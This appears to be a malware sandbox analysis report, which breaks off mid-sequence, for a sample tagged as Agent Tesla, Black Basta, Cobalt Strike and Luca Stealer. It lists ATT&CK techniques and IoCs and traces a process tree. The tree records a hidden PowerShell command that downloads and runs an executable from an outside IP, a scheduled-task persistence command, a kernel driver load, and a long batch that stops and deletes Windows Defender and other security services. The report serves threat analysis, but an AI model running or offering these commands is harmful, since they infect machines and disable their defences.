Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CMD.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2025-04-02_e9c3720b101e469f261fe20e246e3e97_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2c8d23ef22.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	5969479a.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	5a11d930.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	extrac32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	chcp.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7IIl2eE.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	261.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	KXtPusH.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	53e64105fd.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 64 IoCs

Adversaries may check for Internet connectivity on compromised systems.

Internet Connection Discovery

T1016.001

pid	Process
12636	PING.EXE
8252	PING.EXE
10044	PING.EXE
10232	PING.EXE
12976	PING.EXE
13472	PING.EXE
13184	PING.EXE
13364	PING.EXE
9872	PING.EXE
11340	PING.EXE
11796	PING.EXE
13132	PING.EXE
6152	PING.EXE
8540	PING.EXE
5316	PING.EXE
11308	PING.EXE
11428	PING.EXE
12516	PING.EXE
8196	PING.EXE
10080	PING.EXE
10660	PING.EXE
13080	PING.EXE
9128	PING.EXE
11104	PING.EXE
13084	PING.EXE
12176	PING.EXE
7752	PING.EXE
7780	PING.EXE
11240	PING.EXE
12508	PING.EXE
13104	PING.EXE
7260	PING.EXE
11296	PING.EXE
11364	PING.EXE
13708	PING.EXE
10880	PING.EXE
12320	PING.EXE
13188	PING.EXE
10856	PING.EXE
8612	PING.EXE
11920	PING.EXE
7724	PING.EXE
8884	PING.EXE
10008	PING.EXE
10896	PING.EXE
14200	PING.EXE
8468	PING.EXE
9836	PING.EXE
11116	PING.EXE
11608	PING.EXE
13712	PING.EXE
5760	PING.EXE
10064	PING.EXE
13392	PING.EXE
9892	PING.EXE
12212	PING.EXE
14252	PING.EXE
12712	PING.EXE
10848	PING.EXE
12268	PING.EXE
13384	PING.EXE
13960	PING.EXE
13452	PING.EXE
14324	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 4 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

Wi-Fi Discovery

T1016.002

pid	Process
5088	netsh.exe
4420	cmd.exe
1252	netsh.exe
3748	cmd.exe

Checks processor information in registry 2 TTPs 22 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	ddb314f467.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	KXtPusH.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	KXtPusH.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	ddb314f467.exe

Delays execution with timeout.exe 1 IoCs

pid	Process
4540	timeout.exe

Kills process with taskkill 5 IoCs

pid	Process
2456	taskkill.exe
6096	taskkill.exe
1084	taskkill.exe
4996	taskkill.exe
1408	taskkill.exe

Runs ping.exe 1 TTPs 64 IoCs

Remote System Discovery

T1018

pid	Process
7044	PING.EXE
9512	PING.EXE
10720	PING.EXE
12712	PING.EXE
12924	PING.EXE
2108	PING.EXE
6392	PING.EXE
12976	PING.EXE
13764	PING.EXE
13596	PING.EXE
6448	PING.EXE
9920	PING.EXE
11380	PING.EXE
11716	PING.EXE
12096	PING.EXE
12540	PING.EXE
14220	PING.EXE
11296	PING.EXE
11364	PING.EXE
14016	PING.EXE
14040	PING.EXE
6808	PING.EXE
10660	PING.EXE
11516	PING.EXE
7644	PING.EXE
8720	PING.EXE
9444	PING.EXE
10028	PING.EXE
10256	PING.EXE
13632	PING.EXE
13060	PING.EXE
13872	PING.EXE
7372	PING.EXE
10044	PING.EXE
11116	PING.EXE
13248	PING.EXE
12980	PING.EXE
11848	PING.EXE
712	PING.EXE
9376	PING.EXE
10604	PING.EXE
10628	PING.EXE
11164	PING.EXE
12500	PING.EXE
7788	PING.EXE
9652	PING.EXE
8252	PING.EXE
9032	PING.EXE
956	PING.EXE
12992	PING.EXE
13276	PING.EXE
12544	PING.EXE
2164	PING.EXE
5340	PING.EXE
9668	PING.EXE
10468	PING.EXE
8312	PING.EXE
11184	PING.EXE
12568	PING.EXE
13268	PING.EXE
13392	PING.EXE
14284	PING.EXE
7684	PING.EXE
10372	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
4088	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
5200	powershell.exe
5200	powershell.exe
3068	TempDSHHSITETI0IHLQ1CZ0GDXHTYQYHP1FI.EXE
3068	TempDSHHSITETI0IHLQ1CZ0GDXHTYQYHP1FI.EXE
4052	rapes.exe
4052	rapes.exe
3736	KXtPusH.exe
3736	KXtPusH.exe
3736	KXtPusH.exe
3736	KXtPusH.exe
3736	KXtPusH.exe
448	2c8d23ef22.exe
448	2c8d23ef22.exe
448	2c8d23ef22.exe
448	2c8d23ef22.exe
448	2c8d23ef22.exe
448	2c8d23ef22.exe
4660	rapes.exe
4660	rapes.exe
3204	ddb314f467.exe
3204	ddb314f467.exe
5300	cab1283345.exe
5300	cab1283345.exe
4704	53e64105fd.exe
4704	53e64105fd.exe
5300	cab1283345.exe
5300	cab1283345.exe
4704	53e64105fd.exe
4704	53e64105fd.exe
4704	53e64105fd.exe
4060	MSBuild.exe
4060	MSBuild.exe
4060	MSBuild.exe
4060	MSBuild.exe
2220	176117a9a6.exe
2220	176117a9a6.exe
2220	176117a9a6.exe
2220	176117a9a6.exe
4228	powershell.exe
4228	powershell.exe
4228	powershell.exe
5996	Rm3cVPI.exe
5996	Rm3cVPI.exe
5996	Rm3cVPI.exe
5996	Rm3cVPI.exe
1200	MSBuild.exe
1200	MSBuild.exe
1200	MSBuild.exe
1200	MSBuild.exe
5072	rapes.exe
5072	rapes.exe
2356	ac5082e7c9.exe
2356	ac5082e7c9.exe
2356	ac5082e7c9.exe
2356	ac5082e7c9.exe
2356	ac5082e7c9.exe
2356	ac5082e7c9.exe
8808	MSBuild.exe
8808	MSBuild.exe
8808	MSBuild.exe
8808	MSBuild.exe
10944	Passwords.com
10944	Passwords.com
10944	Passwords.com

Suspicious behavior: LoadsDriver 6 IoCs

pid	Process
660	Process not Found
660	Process not Found
7864	5a11d930.exe
7864	5a11d930.exe
7864	5a11d930.exe
7864	5a11d930.exe

Suspicious behavior: MapViewOfSection 3 IoCs

pid	Process
3228	UZPt0hR.exe
3228	UZPt0hR.exe
3228	UZPt0hR.exe

Suspicious use of AdjustPrivilegeToken 42 IoCs

description	pid	Process
Token: SeDebugPrivilege	5200	powershell.exe
Token: 33	4980	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	4980	AUDIODG.EXE
Token: SeDebugPrivilege	3736	KXtPusH.exe
Token: SeDebugPrivilege	2456	taskkill.exe
Token: SeDebugPrivilege	6096	taskkill.exe
Token: SeDebugPrivilege	1084	taskkill.exe
Token: SeDebugPrivilege	4996	taskkill.exe
Token: SeDebugPrivilege	1408	taskkill.exe
Token: SeDebugPrivilege	5240	firefox.exe
Token: SeDebugPrivilege	5240	firefox.exe
Token: SeDebugPrivilege	4704	53e64105fd.exe
Token: SeDebugPrivilege	4228	powershell.exe
Token: SeDebugPrivilege	7864	5a11d930.exe
Token: SeBackupPrivilege	7864	5a11d930.exe
Token: SeRestorePrivilege	7864	5a11d930.exe
Token: SeLoadDriverPrivilege	7864	5a11d930.exe
Token: SeShutdownPrivilege	7864	5a11d930.exe
Token: SeSystemEnvironmentPrivilege	7864	5a11d930.exe
Token: SeSecurityPrivilege	7864	5a11d930.exe
Token: SeDebugPrivilege	10000	tasklist.exe
Token: SeDebugPrivilege	10320	tasklist.exe
Token: SeBackupPrivilege	7864	5a11d930.exe
Token: SeRestorePrivilege	7864	5a11d930.exe
Token: SeDebugPrivilege	7864	5a11d930.exe
Token: SeSystemEnvironmentPrivilege	7864	5a11d930.exe
Token: SeSecurityPrivilege	7864	5a11d930.exe
Token: SeCreatePermanentPrivilege	7864	5a11d930.exe
Token: SeShutdownPrivilege	7864	5a11d930.exe
Token: SeLoadDriverPrivilege	7864	5a11d930.exe
Token: SeIncreaseQuotaPrivilege	7864	5a11d930.exe
Token: SeSecurityPrivilege	7864	5a11d930.exe
Token: SeSystemProfilePrivilege	7864	5a11d930.exe
Token: SeDebugPrivilege	7864	5a11d930.exe
Token: SeMachineAccountPrivilege	7864	5a11d930.exe
Token: SeCreateTokenPrivilege	7864	5a11d930.exe
Token: SeAssignPrimaryTokenPrivilege	7864	5a11d930.exe
Token: SeTcbPrivilege	7864	5a11d930.exe
Token: SeAuditPrivilege	7864	5a11d930.exe
Token: SeSystemEnvironmentPrivilege	7864	5a11d930.exe
Token: SeLoadDriverPrivilege	7864	5a11d930.exe
Token: SeLoadDriverPrivilege	7864	5a11d930.exe

Suspicious use of FindShellTrayWindow 35 IoCs

pid	Process
5328	2025-04-02_e9c3720b101e469f261fe20e246e3e97_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
5328	2025-04-02_e9c3720b101e469f261fe20e246e3e97_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
5328	2025-04-02_e9c3720b101e469f261fe20e246e3e97_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
5300	cab1283345.exe
5300	cab1283345.exe
5300	cab1283345.exe
5300	cab1283345.exe
5300	cab1283345.exe
5300	cab1283345.exe
5300	cab1283345.exe
5240	firefox.exe
5240	firefox.exe
5240	firefox.exe
5240	firefox.exe
5240	firefox.exe
5240	firefox.exe
5240	firefox.exe
5240	firefox.exe
5300	cab1283345.exe
5240	firefox.exe
5240	firefox.exe
5240	firefox.exe
5240	firefox.exe
5240	firefox.exe
5240	firefox.exe
5240	firefox.exe
5240	firefox.exe
5240	firefox.exe
5300	cab1283345.exe
5240	firefox.exe
5300	cab1283345.exe
5300	cab1283345.exe
10944	Passwords.com
10944	Passwords.com
10944	Passwords.com

Suspicious use of SendNotifyMessage 29 IoCs

pid	Process
5328	2025-04-02_e9c3720b101e469f261fe20e246e3e97_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
5328	2025-04-02_e9c3720b101e469f261fe20e246e3e97_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
5328	2025-04-02_e9c3720b101e469f261fe20e246e3e97_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
5300	cab1283345.exe
5300	cab1283345.exe
5300	cab1283345.exe
5300	cab1283345.exe
5300	cab1283345.exe
5300	cab1283345.exe
5300	cab1283345.exe
5240	firefox.exe
5240	firefox.exe
5240	firefox.exe
5240	firefox.exe
5300	cab1283345.exe
5240	firefox.exe
5240	firefox.exe
5240	firefox.exe
5240	firefox.exe
5240	firefox.exe
5240	firefox.exe
5240	firefox.exe
5240	firefox.exe
5300	cab1283345.exe
5300	cab1283345.exe
5300	cab1283345.exe
10944	Passwords.com
10944	Passwords.com
10944	Passwords.com

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
5240	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5328 wrote to memory of 5100	5328	2025-04-02_e9c3720b101e469f261fe20e246e3e97_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	85
PID 5328 wrote to memory of 5100	5328	2025-04-02_e9c3720b101e469f261fe20e246e3e97_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	85
PID 5328 wrote to memory of 5100	5328	2025-04-02_e9c3720b101e469f261fe20e246e3e97_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	85
PID 5328 wrote to memory of 2372	5328	2025-04-02_e9c3720b101e469f261fe20e246e3e97_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	86
PID 5328 wrote to memory of 2372	5328	2025-04-02_e9c3720b101e469f261fe20e246e3e97_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	86
PID 5328 wrote to memory of 2372	5328	2025-04-02_e9c3720b101e469f261fe20e246e3e97_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	86
PID 5100 wrote to memory of 4088	5100	cmd.exe	88
PID 5100 wrote to memory of 4088	5100	cmd.exe	88
PID 5100 wrote to memory of 4088	5100	cmd.exe	88
PID 2372 wrote to memory of 5200	2372	mshta.exe	91
PID 2372 wrote to memory of 5200	2372	mshta.exe	91
PID 2372 wrote to memory of 5200	2372	mshta.exe	91
PID 5200 wrote to memory of 3068	5200	powershell.exe	102
PID 5200 wrote to memory of 3068	5200	powershell.exe	102
PID 5200 wrote to memory of 3068	5200	powershell.exe	102
PID 3068 wrote to memory of 4052	3068	TempDSHHSITETI0IHLQ1CZ0GDXHTYQYHP1FI.EXE	103
PID 3068 wrote to memory of 4052	3068	TempDSHHSITETI0IHLQ1CZ0GDXHTYQYHP1FI.EXE	103
PID 3068 wrote to memory of 4052	3068	TempDSHHSITETI0IHLQ1CZ0GDXHTYQYHP1FI.EXE	103
PID 4052 wrote to memory of 4428	4052	rapes.exe	104
PID 4052 wrote to memory of 4428	4052	rapes.exe	104
PID 4052 wrote to memory of 4428	4052	rapes.exe	104
PID 4428 wrote to memory of 1000	4428	apple.exe	105
PID 4428 wrote to memory of 1000	4428	apple.exe	105
PID 4428 wrote to memory of 1000	4428	apple.exe	105
PID 1000 wrote to memory of 1268	1000	261.exe	107
PID 1000 wrote to memory of 1268	1000	261.exe	107
PID 1268 wrote to memory of 2368	1268	cmd.exe	109
PID 1268 wrote to memory of 2368	1268	cmd.exe	109
PID 1268 wrote to memory of 2368	1268	cmd.exe	109
PID 2368 wrote to memory of 2932	2368	261.exe	110
PID 2368 wrote to memory of 2932	2368	261.exe	110
PID 2932 wrote to memory of 1840	2932	cmd.exe	112
PID 2932 wrote to memory of 1840	2932	cmd.exe	112
PID 2932 wrote to memory of 2960	2932	cmd.exe	113
PID 2932 wrote to memory of 2960	2932	cmd.exe	113
PID 2932 wrote to memory of 4540	2932	cmd.exe	114
PID 2932 wrote to memory of 4540	2932	cmd.exe	114
PID 2932 wrote to memory of 3284	2932	cmd.exe	115
PID 2932 wrote to memory of 3284	2932	cmd.exe	115
PID 2932 wrote to memory of 856	2932	cmd.exe	116
PID 2932 wrote to memory of 856	2932	cmd.exe	116
PID 2932 wrote to memory of 1716	2932	cmd.exe	117
PID 2932 wrote to memory of 1716	2932	cmd.exe	117
PID 2932 wrote to memory of 5796	2932	cmd.exe	118
PID 2932 wrote to memory of 5796	2932	cmd.exe	118
PID 2932 wrote to memory of 1740	2932	cmd.exe	119
PID 2932 wrote to memory of 1740	2932	cmd.exe	119
PID 2932 wrote to memory of 2592	2932	cmd.exe	120
PID 2932 wrote to memory of 2592	2932	cmd.exe	120
PID 2932 wrote to memory of 5500	2932	cmd.exe	121
PID 2932 wrote to memory of 5500	2932	cmd.exe	121
PID 2932 wrote to memory of 2780	2932	cmd.exe	122
PID 2932 wrote to memory of 2780	2932	cmd.exe	122
PID 2932 wrote to memory of 1272	2932	cmd.exe	123
PID 2932 wrote to memory of 1272	2932	cmd.exe	123
PID 2932 wrote to memory of 3668	2932	cmd.exe	124
PID 2932 wrote to memory of 3668	2932	cmd.exe	124
PID 2932 wrote to memory of 2884	2932	cmd.exe	125
PID 2932 wrote to memory of 2884	2932	cmd.exe	125
PID 2932 wrote to memory of 5804	2932	cmd.exe	126
PID 2932 wrote to memory of 5804	2932	cmd.exe	126
PID 2932 wrote to memory of 5348	2932	cmd.exe	127
PID 2932 wrote to memory of 5348	2932	cmd.exe	127
PID 2932 wrote to memory of 5864	2932	cmd.exe	128

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	KXtPusH.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	KXtPusH.exe

C:\Users\Admin\AppData\Local\Temp\2025-04-02_e9c3720b101e469f261fe20e246e3e97_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
"C:\Users\Admin\AppData\Local\Temp\2025-04-02_e9c3720b101e469f261fe20e246e3e97_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:5328
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /create /tn SUhHfmaGkDK /tr "mshta C:\Users\Admin\AppData\Local\Temp\zlnZCJJrI.hta" /sc minute /mo 25 /ru "Admin" /f
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:5100
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /tn SUhHfmaGkDK /tr "mshta C:\Users\Admin\AppData\Local\Temp\zlnZCJJrI.hta" /sc minute /mo 25 /ru "Admin" /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:4088
- C:\Windows\SysWOW64\mshta.exe
  mshta C:\Users\Admin\AppData\Local\Temp\zlnZCJJrI.hta
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2372
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'DSHHSITETI0IHLQ1CZ0GDXHTYQYHP1FI.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Downloads MZ/PE file
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:5200
  - - C:\Users\Admin\AppData\Local\TempDSHHSITETI0IHLQ1CZ0GDXHTYQYHP1FI.EXE
      "C:\Users\Admin\AppData\Local\TempDSHHSITETI0IHLQ1CZ0GDXHTYQYHP1FI.EXE"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:3068
    - - C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Downloads MZ/PE file
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Identifies Wine through registry keys
        Adds Run key to start application
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:4052
      - C:\Users\Admin\AppData\Local\Temp\10416840101\apple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10416840101\apple.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4428
        
        C:\Users\Admin\AppData\Local\Temp\261.exe
        
        "C:\Users\Admin\AppData\Local\Temp\261.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1000
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B73A.tmp\B73B.tmp\B73C.bat C:\Users\Admin\AppData\Local\Temp\261.exe"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:1268
        
        C:\Users\Admin\AppData\Local\Temp\261.exe
        
        "C:\Users\Admin\AppData\Local\Temp\261.exe" go
        9⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2368
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B844.tmp\B845.tmp\B846.bat C:\Users\Admin\AppData\Local\Temp\261.exe go"
        10⤵
        Drops file in Program Files directory
        Suspicious use of WriteProcessMemory
        
        PID:2932
        
        C:\Windows\system32\sc.exe
        
        sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
        11⤵
        Launches sc.exe
        
        PID:1840
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        11⤵
        Launches sc.exe
        
        PID:2960
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        11⤵
        Delays execution with timeout.exe
        
        PID:4540
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        11⤵
        Launches sc.exe
        
        PID:3284
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        11⤵
        Launches sc.exe
        
        PID:856
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
        11⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:1716
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
        11⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:5796
        
        C:\Windows\system32\sc.exe
        
        sc stop "WinDefend"
        11⤵
        Launches sc.exe
        
        PID:1740
        
        C:\Windows\system32\sc.exe
        
        sc delete "WinDefend"
        11⤵
        Launches sc.exe
        
        PID:2592
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
        11⤵
        
        PID:5500
        
        C:\Windows\system32\sc.exe
        
        sc stop "MDCoreSvc"
        11⤵
        Launches sc.exe
        
        PID:2780
        
        C:\Windows\system32\sc.exe
        
        sc delete "MDCoreSvc"
        11⤵
        Launches sc.exe
        
        PID:1272
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
        11⤵
        
        PID:3668
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisSvc"
        11⤵
        Launches sc.exe
        
        PID:2884
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisSvc"
        11⤵
        Launches sc.exe
        
        PID:5804
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
        11⤵
        
        PID:5348
        
        C:\Windows\system32\sc.exe
        
        sc stop "Sense"
        11⤵
        Launches sc.exe
        
        PID:5864
        
        C:\Windows\system32\sc.exe
        
        sc delete "Sense"
        11⤵
        Launches sc.exe
        
        PID:5492
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
        11⤵
        
        PID:5284
        
        C:\Windows\system32\sc.exe
        
        sc stop "wscsvc"
        11⤵
        Launches sc.exe
        
        PID:5512
        
        C:\Windows\system32\sc.exe
        
        sc delete "wscsvc"
        11⤵
        Launches sc.exe
        
        PID:1956
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
        11⤵
        Modifies security service
        
        PID:1348
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmBroker"
        11⤵
        Launches sc.exe
        
        PID:3156
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmBroker"
        11⤵
        Launches sc.exe
        
        PID:2384
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
        11⤵
        
        PID:5504
        
        C:\Windows\system32\sc.exe
        
        sc stop "SecurityHealthService"
        11⤵
        Launches sc.exe
        
        PID:5692
        
        C:\Windows\system32\sc.exe
        
        sc delete "SecurityHealthService"
        11⤵
        Launches sc.exe
        
        PID:5360
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
        11⤵
        
        PID:4760
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefsvc"
        11⤵
        Launches sc.exe
        
        PID:3008
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefsvc"
        11⤵
        Launches sc.exe
        
        PID:6064
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
        11⤵
        
        PID:3308
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefusersvc"
        11⤵
